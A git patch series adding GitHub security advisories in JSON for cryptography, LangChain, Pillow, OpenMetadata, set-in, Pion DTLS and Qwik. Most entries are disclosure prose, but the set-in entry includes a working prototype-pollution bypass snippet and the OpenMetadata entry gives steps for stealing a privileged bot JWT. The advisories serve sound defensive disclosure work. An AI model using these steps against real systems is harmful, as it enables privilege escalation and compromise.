b/advisories/github-reviewed/2026/02/GHSA-r6ph-v2qm-q3c2/GHSA-r6ph-v2qm-q3c2.json index 1cd1f917036ff..d8b7682861f5b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-r6ph-v2qm-q3c2/GHSA-r6ph-v2qm-q3c2.json +++ b/advisories/github-reviewed/2026/02/GHSA-r6ph-v2qm-q3c2/GHSA-r6ph-v2qm-q3c2.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-r6ph-v2qm-q3c2", - "modified": "2026-02-10T21:27:06Z", + "modified": "2026-02-11T14:14:19Z", "published": "2026-02-10T21:27:06Z", "aliases": [ "CVE-2026-26007" ], "summary": "cryptography Vulnerable to a Subgroup Attack Due to Missing Subgroup Validation for SECT Curves", "details": "## Vulnerability Summary\n\nThe `public_key_from_numbers` (or `EllipticCurvePublicNumbers.public_key()`), `EllipticCurvePublicNumbers.public_key()`, `load_der_public_key()` and `load_pem_public_key()` functions do not verify that the point belongs to the expected prime-order subgroup of the curve.\n\nThis missing validation allows an attacker to provide a public key point `P` from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as `S = [victim_private_key]P` via ECDH, this leaks information about `victim_private_key mod (small_subgroup_order)`. For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup.\n\nOnly SECT curves are impacted by this.\n\n## Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine", - "severity": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], "affected": [ { "package": { @@ -38,6 +43,10 @@ "type": "WEB", "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007" + }, { "type": "WEB", "url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c" @@ -49,6 +58,10 @@ { "type": "WEB", "url": "https://github.com/pyca/cryptography/releases/tag/46.0.5" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/10/4" } ], "database_specific": { @@ -58,6 +71,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-10T21:27:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-10T22:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-vm6g-8r4h-22x8/GHSA-vm6g-8r4h-22x8.json b/advisories/github-reviewed/2026/02/GHSA-vm6g-8r4h-22x8/GHSA-vm6g-8r4h-22x8.json index 8f2d3e019ebc2..760ca40f6bff6 100644 --- a/advisories/github-reviewed/2026/02/GHSA-vm6g-8r4h-22x8/GHSA-vm6g-8r4h-22x8.json +++ b/advisories/github-reviewed/2026/02/GHSA-vm6g-8r4h-22x8/GHSA-vm6g-8r4h-22x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vm6g-8r4h-22x8", - "modified": "2026-02-03T20:59:18Z", + "modified": "2026-02-11T14:13:56Z", "published": "2026-02-03T20:59:18Z", "aliases": [ "CVE-2026-25155" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/QwikDev/qwik/security/advisories/GHSA-vm6g-8r4h-22x8" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25155" + }, { "type": "WEB", "url": "https://github.com/QwikDev/qwik/commit/d70d7099b90b998f1aac7cedc21c67d87bac4c75" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-03T20:59:18Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-03T22:16:30Z" } } \ No newline at end of file From 7cfe42bb5c46b1a2e269d0dab7009e368663690a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 14:24:33 +0000 Subject: [PATCH 005/215] Publish Advisories GHSA-2g6r-c272-w58r GHSA-cfh3-3jmp-rvhc GHSA-pqqf-7hxm-rj5r --- .../GHSA-2g6r-c272-w58r.json | 69 +++++++++++++++++++ .../GHSA-cfh3-3jmp-rvhc.json | 64 +++++++++++++++++ .../GHSA-pqqf-7hxm-rj5r.json | 61 ++++++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-2g6r-c272-w58r/GHSA-2g6r-c272-w58r.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json diff --git a/advisories/github-reviewed/2026/02/GHSA-2g6r-c272-w58r/GHSA-2g6r-c272-w58r.json b/advisories/github-reviewed/2026/02/GHSA-2g6r-c272-w58r/GHSA-2g6r-c272-w58r.json new file mode 100644 index 0000000000000..57228306aa0ab --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2g6r-c272-w58r/GHSA-2g6r-c272-w58r.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g6r-c272-w58r", + "modified": "2026-02-11T14:23:13Z", + "published": "2026-02-11T14:23:13Z", + "aliases": [ + "CVE-2026-26013" + ], + "summary": "LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages", + "details": "## Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting\n\n### Summary\nThe `ChatOpenAI.get_num_tokens_from_messages()` method fetches arbitrary `image_url` values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.\n\n### Severity\n**Low** - The vulnerability allows SSRF attacks but has limited impact due to:\n- Responses are not returned to the attacker (blind SSRF)\n- Default 5-second timeout limits resource exhaustion\n- Non-image responses fail at PIL image parsing\n\n### Impact\nAn attacker who can control image URLs passed to `get_num_tokens_from_messages()` can:\n- Trigger HTTP requests from the application server to arbitrary internal or external URLs\n- Cause the server to access internal network resources (private IPs, cloud metadata endpoints)\n- Cause minor resource consumption through image downloads (bounded by timeout)\n\n**Note:** This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).\n\n### Details\nThe vulnerable code path:\n1. `get_num_tokens_from_messages()` processes messages containing `image_url` content blocks\n2. For images without `detail: \"low\"`, it calls `_url_to_size()` to fetch the image and compute token counts\n3. `_url_to_size()` performs `httpx.get(image_source)` on any URL without validation\n4. Prior to the patch, there was no SSRF protection, size limits, or explicit timeout\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py`\n\n### Patches\nThe vulnerability has been patched in `langchain-openai==1.1.9` (requires `langchain-core==1.2.11`).\n\nThe patch adds:\n1. **SSRF validation** using `langchain_core._security._ssrf_protection.validate_safe_url()` to block:\n - Private IP ranges (RFC 1918, loopback, link-local)\n - Cloud metadata endpoints (169.254.169.254, etc.)\n - Invalid URL schemes\n2. **Explicit size limits** (50 MB maximum, matching OpenAI's payload limit)\n3. **Explicit timeout** (5 seconds, same as `httpx.get` default)\n4. **Allow disabling image fetching** via `allow_fetching_images=False` parameter\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n1. **Sanitize input:** Validate and filter `image_url` values before passing messages to token counting or model invocation\n2. **Use network controls:** Implement egress filtering to prevent outbound requests to private IPs", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "langchain-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2.11" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-2g6r-c272-w58r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26013" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchain/commit/2b4b1dc29a833d4053deba4c2b77a3848c834565" + }, + { + "type": "PACKAGE", + "url": "https://github.com/langchain-ai/langchain" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.11" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T14:23:13Z", + "nvd_published_at": "2026-02-10T22:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json b/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json new file mode 100644 index 0000000000000..8b699f1a7b257 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-cfh3-3jmp-rvhc/GHSA-cfh3-3jmp-rvhc.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfh3-3jmp-rvhc", + "modified": "2026-02-11T14:22:50Z", + "published": "2026-02-11T14:22:50Z", + "aliases": [ + "CVE-2026-25990" + ], + "summary": "Pillow affected by out-of-bounds write when loading PSD images", + "details": "### Impact\nAn out-of-bounds write may be triggered when loading a specially crafted PSD image. Pillow >= 10.3.0 users are affected.\n\n### Patches\nPillow 12.1.1 will be released shortly with a fix for this.\n\n### Workarounds\n`Image.open()` has a `formats` parameter that can be used to prevent PSD images from being opened.\n\n### References\nPillow 12.1.1 will add release notes at https://pillow.readthedocs.io/en/stable/releasenotes/index.html", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "pillow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.3.0" + }, + { + "fixed": "12.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc" + }, + { + "type": "WEB", + "url": "https://github.com/python-pillow/Pillow/pull/9427" + }, + { + "type": "WEB", + "url": "https://github.com/python-pillow/Pillow/commit/54ba4db542ad3c7b918812a4e2d69c27735a3199" + }, + { + "type": "PACKAGE", + "url": "https://github.com/python-pillow/Pillow" + }, + { + "type": "WEB", + "url": "https://pillow.readthedocs.io/en/stable/releasenotes/12.1.1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T14:22:50Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json b/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json new file mode 100644 index 0000000000000..904c850827311 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-pqqf-7hxm-rj5r/GHSA-pqqf-7hxm-rj5r.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqqf-7hxm-rj5r", + "modified": "2026-02-11T14:23:02Z", + "published": "2026-02-11T14:23:02Z", + "aliases": [ + "CVE-2026-26010" + ], + "summary": "Leaky JWTs in OpenMetadata exposing highly-privileged bot users", + "details": "### Summary\nCalls issued by the UI against `/api/v1/ingestionPipelines` leak JWTs used by `ingestion-bot` for certain services (Glue / Redshift / Postgres)\n\n### Details\nAny read-only user can gain access to a highly privileged account, typically which has the Ingestion Bot Role. This enables destructive changes in OpenMetadata instances, and potential data leakage (e.g. sample data, or service metadata which would be unavailable per roles/policies). \n\n\n### PoC\nI was able to extract the JWT used by the bot/agent populating [sample_athena.default](https://sandbox.open-metadata.org/database/sample_athena.default) in the Collate Sandbox. To prove this out, I mutated the description to this UUID: `fe2e4cc1-da72-4acf-8535-112a3cfa9c7e,` which you can see @ https://sandbox.open-metadata.org/database/sample_athena.default.\n\n#### Steps to Reproduce\n\n* Create a Collate Sandbox account; these are non-admin accounts by default with minimal permissions.\n* Open the Developer Console\n* Go to the Services Page. In this case, [sample_athena](https://sandbox.open-metadata.org/service/databaseServices/sample_athena?showDeletedTables=false¤tPage=1), though other services \n* In the Network tab, introspect the request made to api/v1/services/ingestionPipelines, and find the jwtToken in the response:\n\"image\"\n\n* Use the JWT to issue (potentially destructive) API calls\n\"image\"\n\n* Resulting mutated description:\n\"image\"\n\nNote that this is also the case for these services, among others:\n* [acme_nexus_redshift](https://sandbox.open-metadata.org/service/databaseServices/acme_nexus_redshift) \n* [sample_postgres](https://sandbox.open-metadata.org/service/databaseServices/sample_postgres)\n\n### Proposed Remediation\nRedact jwtToken in API payload.\nImplement role-based filtering - Only return JWT tokens to users with explicit admin/service account permissions\n(for Admins) Rotate Ingestion Bot Tokens in affected environments\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n* Vulnerability Type: Privilege Escalation\n* Risk: User impersonation, even for those with read-only access, can lead to destructive outcomes if malicious actors leverage the leaked JWT.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.open-metadata:openmetadata-sdk" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-pqqf-7hxm-rj5r" + }, + { + "type": "PACKAGE", + "url": "https://github.com/open-metadata/OpenMetadata" + }, + { + "type": "WEB", + "url": "https://github.com/open-metadata/OpenMetadata/releases/tag/1.11.8-release" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T14:23:02Z", + "nvd_published_at": null + } +} \ No newline at end of file From 7ca85f33a8ac944cc0d0addc2320d1be696ae996 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 15:14:39 +0000 Subject: [PATCH 006/215] Publish Advisories GHSA-2c4m-g7rx-63q7 GHSA-9f3f-wv7r-qc8r GHSA-gf3v-fwqg-4vh7 --- .../GHSA-2c4m-g7rx-63q7.json | 71 ++++++++++++ .../GHSA-9f3f-wv7r-qc8r.json | 101 ++++++++++++++++++ .../GHSA-gf3v-fwqg-4vh7.json | 70 ++++++++++++ 3 files changed, 242 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json diff --git a/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json b/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json new file mode 100644 index 0000000000000..f6fc4a7483fbe --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2c4m-g7rx-63q7/GHSA-2c4m-g7rx-63q7.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c4m-g7rx-63q7", + "modified": "2026-02-11T15:13:28Z", + "published": "2026-02-11T15:13:28Z", + "aliases": [], + "summary": "set-in Affected by Prototype Pollution", + "details": "### Summary\nA prototype pollution vulnerability exists in the the npm package set-in (>=2.0.1). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. This has been fixed in version 2.0.5.\n\n### Details\nThe vulnerability resides in line 28 of https://github.com/ahdinosaur/set-in/blob/master/index.js where includes() function is used to check whether user provided input contain forbidden strings.\n\n### PoC\n#### Steps to reproduce\n1. Install latest version of set-in using npm install or cloning from git\n2. Run the following code snippet:\n\n```javascript\nArray.prototype.includes = () => false; \nconst si = require('set-in');\nconst obj = {};\nconsole.log({}.polluted);\nsi(obj, [\n 'constructor',\n 'prototype',\n 'polluted'\n], 'yes');\nconsole.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred\n```\n\n#### Expected behavior\nPrototype pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\nObject.prototype is polluted\nThis is printed on the console:\n```\nundefined \nyes\n```\n\n### Impact\nThis is a prototype pollution vulnerability, which can have severe security implications depending on how set-in is used by downstream applications. Any application that processes attacker-controlled input using this package may be affected.\nIt could potentially lead to the following problems:\n1. Authentication bypass\n2. Denial of service\n3. Remote code execution (if polluted property is passed to sinks like eval or child_process)", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "set-in" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.1" + }, + { + "fixed": "2.0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ahdinosaur/set-in/security/advisories/GHSA-2c4m-g7rx-63q7" + }, + { + "type": "WEB", + "url": "https://github.com/ahdinosaur/set-in/pull/6" + }, + { + "type": "WEB", + "url": "https://github.com/ahdinosaur/set-in/commit/34842cc02de3fd65d6f8bd0b268347e7b390125b" + }, + { + "type": "WEB", + "url": "https://github.com/ahdinosaur/set-in/commit/6bad255961d379e4b1f5fbc52ef9dc8420816f24" + }, + { + "type": "WEB", + "url": "https://github.com/ahdinosaur/set-in/commit/d87c1a09fa2edb55cd76440a67d83d1cb828df11" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ahdinosaur/set-in" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T15:13:28Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json new file mode 100644 index 0000000000000..b31d9b2fd3891 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f3f-wv7r-qc8r", + "modified": "2026-02-11T15:13:12Z", + "published": "2026-02-11T15:13:12Z", + "aliases": [], + "summary": "Pion DTLS's usage of random nonce generation with AES GCM ciphers risks leaking the authentication key", + "details": "### Impact\nPion DTLS versions v1.0.0 through v3.1.0 use random nonce generation with AES GCM ciphers, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging the reuse of a nonce in a session and a \"forbidden attack\". \n\n### Patches\nUpgrade to v3.1.0 or later. This version includes PR #796, which uses the 64-bit sequence number to populate the `nonce_explicit` part of the GCM nonce. This is according to best practice outlined in [RFC 9325 section 7.2.1](https://www.rfc-editor.org/rfc/rfc9325#section-7.2.1).\n\n### Workarounds\nThere are no workarounds without upgrading to version v3.1.0 or later.\n\n### References\nCommit fixing the bug: https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f\nPull request: #796", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/pion/dtls/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/pion/dtls/v2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.2.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/pion/dtls" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.5.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pion/dtls/security/advisories/GHSA-9f3f-wv7r-qc8r" + }, + { + "type": "WEB", + "url": "https://github.com/pion/dtls/pull/796" + }, + { + "type": "WEB", + "url": "https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pion/dtls" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T15:13:12Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json b/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json new file mode 100644 index 0000000000000..8937e7770da6b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gf3v-fwqg-4vh7/GHSA-gf3v-fwqg-4vh7.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gf3v-fwqg-4vh7", + "modified": "2026-02-11T15:13:20Z", + "published": "2026-02-11T15:13:20Z", + "aliases": [], + "summary": "@langchain/community affected by SSRF Bypass in RecursiveUrlLoader via insufficient URL origin validation", + "details": "## Description\n\nThe `RecursiveUrlLoader` class in `@langchain/community` is a web crawler that recursively follows links from a starting URL. Its `preventOutside` option (enabled by default) is intended to restrict crawling to the same site as the base URL.\n\nThe implementation used `String.startsWith()` to compare URLs, which does not perform semantic URL validation. An attacker who controls content on a crawled page could include links to domains that share a string prefix with the target (e.g., `https://example.com.attacker.com` passes a `startsWith` check against `https://example.com`), causing the crawler to follow links to attacker-controlled or internal infrastructure.\n\nAdditionally, the crawler performed no validation against private or reserved IP addresses. A crawled page could include links targeting cloud metadata services (`169.254.169.254`), localhost, or RFC 1918 addresses, and the crawler would fetch them without restriction.\n\n## Impact\n\nAn attacker who can influence the content of a page being crawled (e.g., by placing a link on a public-facing page, forum, or user-generated content) could cause the crawler to:\n\n- Fetch cloud instance metadata (AWS, GCP, Azure), potentially exposing IAM credentials and session tokens\n- Access internal services on private networks (`10.x`, `172.16.x`, `192.168.x`)\n- Connect to localhost services\n- Exfiltrate response data via attacker-controlled redirect chains\n\nThis is exploitable in any environment where `RecursiveUrlLoader` runs on infrastructure with access to cloud metadata or internal services — which includes most cloud-hosted deployments.\n\n## Resolution\n\nTwo changes were made:\n\n1. **Origin comparison replaced.** The `startsWith` check was replaced with a strict origin comparison using the URL API (`new URL(link).origin === new URL(baseUrl).origin`). This correctly validates scheme, hostname, and port as a unit, preventing subdomain-based bypasses.\n\n2. **SSRF validation added to all fetch operations.** A new URL validation module (`@langchain/core/utils/ssrf`) was introduced and applied before every outbound fetch in the crawler. This blocks requests to:\n - **Cloud metadata endpoints:** `169.254.169.254`, `169.254.170.2`, `100.100.100.200`, `metadata.google.internal`, and related hostnames\n - **Private IP ranges:** `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`, `127.0.0.0/8`, `169.254.0.0/16`\n - **IPv6 equivalents:** `::1`, `fc00::/7`, `fe80::/10`\n - **Non-HTTP/HTTPS schemes** (`file:`, `ftp:`, `javascript:`, etc.)\n\nCloud metadata endpoints are unconditionally blocked and cannot be overridden.\n\n## Workarounds\n\nUsers who cannot upgrade immediately should avoid using `RecursiveUrlLoader` on untrusted or user-influenced content, or should run the crawler in a network environment without access to cloud metadata or internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@langchain/community" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.14" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.13" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchainjs/security/advisories/GHSA-gf3v-fwqg-4vh7" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchainjs/pull/9990" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchainjs/commit/d5e3db0d01ab321ec70a875805b2f74aefdadf9d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/langchain-ai/langchainjs" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchainjs/releases/tag/%40langchain%2Fcommunity%401.1.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T15:13:20Z", + "nvd_published_at": null + } +} \ No newline at end of file From d8db35e2191108ed6054b0702b38796135db47af Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 15:31:45 +0000 Subject: [PATCH 007/215] Advisory Database Sync --- .../GHSA-v6c5-9mp4-mwq4.json | 6 ++- .../GHSA-hrx4-rccm-xj6c.json | 6 ++- .../GHSA-vjm9-gq46-wc5j.json | 6 ++- .../GHSA-8x3f-4jvw-ww73.json | 6 ++- .../GHSA-36h4-32cj-m84w.json | 36 +++++++++++++ .../GHSA-36x3-gg5m-4wjp.json | 48 +++++++++++++++++ .../GHSA-39q6-v89p-42vg.json | 36 +++++++++++++ .../GHSA-3q2x-q945-c5mm.json | 52 +++++++++++++++++++ .../GHSA-3rgq-74p3-8xc5.json | 36 +++++++++++++ .../GHSA-3v9p-vgm5-cgm3.json | 36 +++++++++++++ .../GHSA-3wh2-2wc5-f45w.json | 36 +++++++++++++ .../GHSA-3x5q-gxp5-wv27.json | 36 +++++++++++++ .../GHSA-45q5-pv8q-m46g.json | 36 +++++++++++++ .../GHSA-4chc-49pc-wcqq.json | 36 +++++++++++++ .../GHSA-4r22-3675-4h3p.json | 36 +++++++++++++ .../GHSA-4rf7-qgf8-847c.json | 36 +++++++++++++ .../GHSA-59g4-3crj-9w92.json | 36 +++++++++++++ .../GHSA-5cc2-fh28-2crw.json | 36 +++++++++++++ .../GHSA-673q-8hc3-p8qm.json | 36 +++++++++++++ .../GHSA-67mv-4hj2-xp3g.json | 36 +++++++++++++ .../GHSA-682g-84mv-mcxh.json | 36 +++++++++++++ .../GHSA-6j8r-j98h-9g9f.json | 6 ++- .../GHSA-6mvg-6pj4-7q9q.json | 36 +++++++++++++ .../GHSA-7369-4q85-89cw.json | 36 +++++++++++++ .../GHSA-76mg-x9r8-w496.json | 36 +++++++++++++ .../GHSA-7gxv-gvrv-j982.json | 52 +++++++++++++++++++ .../GHSA-87q4-v2f4-jh82.json | 36 +++++++++++++ .../GHSA-8863-jvcv-whf3.json | 36 +++++++++++++ .../GHSA-8fjj-5wqp-475m.json | 36 +++++++++++++ .../GHSA-8v4p-4wrw-v43w.json | 44 ++++++++++++++++ .../GHSA-9278-6hcj-2p4j.json | 52 +++++++++++++++++++ .../GHSA-92hq-qvrx-74gm.json | 36 +++++++++++++ .../GHSA-93qw-26xw-p89x.json | 36 +++++++++++++ .../GHSA-9cqh-c6j9-hwfw.json | 36 +++++++++++++ .../GHSA-9q6f-339m-42fv.json | 36 +++++++++++++ .../GHSA-9qqr-wpm4-gqc3.json | 48 +++++++++++++++++ .../GHSA-9vw9-245h-4g2j.json | 36 +++++++++++++ .../GHSA-9w4f-2qq2-5rc9.json | 6 ++- .../GHSA-9wvg-f2jp-vhcf.json | 36 +++++++++++++ .../GHSA-cj2c-wh4j-hw39.json | 36 +++++++++++++ .../GHSA-cp3m-5wf6-4649.json | 36 +++++++++++++ .../GHSA-f688-gwj3-8h54.json | 36 +++++++++++++ .../GHSA-fmj5-jwwm-6cm2.json | 48 +++++++++++++++++ .../GHSA-fmmr-xg7j-x2cq.json | 36 +++++++++++++ .../GHSA-fmxw-gfwm-67w3.json | 36 +++++++++++++ .../GHSA-frff-9f6h-44cx.json | 36 +++++++++++++ .../GHSA-fxh5-4p4v-76pm.json | 36 +++++++++++++ .../GHSA-g4c6-xx88-2hqq.json | 36 +++++++++++++ .../GHSA-g4hh-hm34-58p5.json | 36 +++++++++++++ .../GHSA-g4r6-4jg4-9556.json | 36 +++++++++++++ .../GHSA-g4xh-r45m-435w.json | 36 +++++++++++++ .../GHSA-g7hj-9w6f-45m2.json | 36 +++++++++++++ .../GHSA-g94q-pfx9-4w8h.json | 36 